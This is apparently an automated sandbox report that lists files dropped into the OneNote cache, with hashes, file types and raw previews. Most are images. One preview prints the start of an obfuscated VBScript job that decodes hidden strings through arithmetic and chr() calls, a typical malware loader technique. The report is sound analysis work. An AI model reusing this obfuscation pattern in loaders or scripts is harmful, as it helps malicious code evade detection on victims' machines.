Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000004U.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000051.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	HTML document, ASCII text, with very long lines (792), with CRLF line terminators
Category:	dropped
Size (bytes):	55113
Entropy (8bit):	5.216959514455489
Encrypted:	false
SSDEEP:	768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
MD5:	AE25F2104967B2708AC9DBA80AAC52FD
SHA1:	7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
SHA-256:	11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
SHA-512:	D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
Malicious:	false
Preview:	<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	567
Entropy (8bit):	7.499095532051442
Encrypted:	false
SSDEEP:	12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
MD5:	D055CE625528E448C61315EAAEF5BB71
SHA1:	029DF4C872B1C154F32E7FE94F434547C3BA6192
SHA-256:	85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
SHA-512:	705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
Malicious:	false
Preview:	.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{\|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...\|...a<!..d....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000053.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
Category:	dropped
Size (bytes):	49224
Entropy (8bit):	7.402134460714453
Encrypted:	false
SSDEEP:	1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
MD5:	B7FC313714EDD7866F4C76527282C2B5
SHA1:	C86217B46956933FAE4A30483A63B33F34B8C503
SHA-256:	B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
SHA-512:	038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
Malicious:	false
Preview:	......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	Matlab v4 mat-file (little endian) h\001, numeric, rows 262223750, columns 0
Category:	dropped
Size (bytes):	72
Entropy (8bit):	2.4938252486923767
Encrypted:	false
SSDEEP:	3:ulXqHaarsGlmXZ71oRatl:KqxrsGGA8X
MD5:	75CB147BB11E9249653F23D16EC04626
SHA1:	6F5BA49F75462EB211258F850D39AD0B4FFDAC9D
SHA-256:	E3CB4738CC747024E9D243194DBE53AF4DEDDA8CE78B9F595DC4F80DAED24A03
SHA-512:	28E517E9F28533C9BB08E1824021E800803389BE2D7DFDC1AB50DCA806FBCDB578B151083B85EBF259D6BD5BD25B6D66F108E4281EC1C5FB3024587959E50FA0
Malicious:	false
Preview:	.....7..............h...............z........-...+......f&..............

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000005.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000006.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000B.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000C.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000D.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000E.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
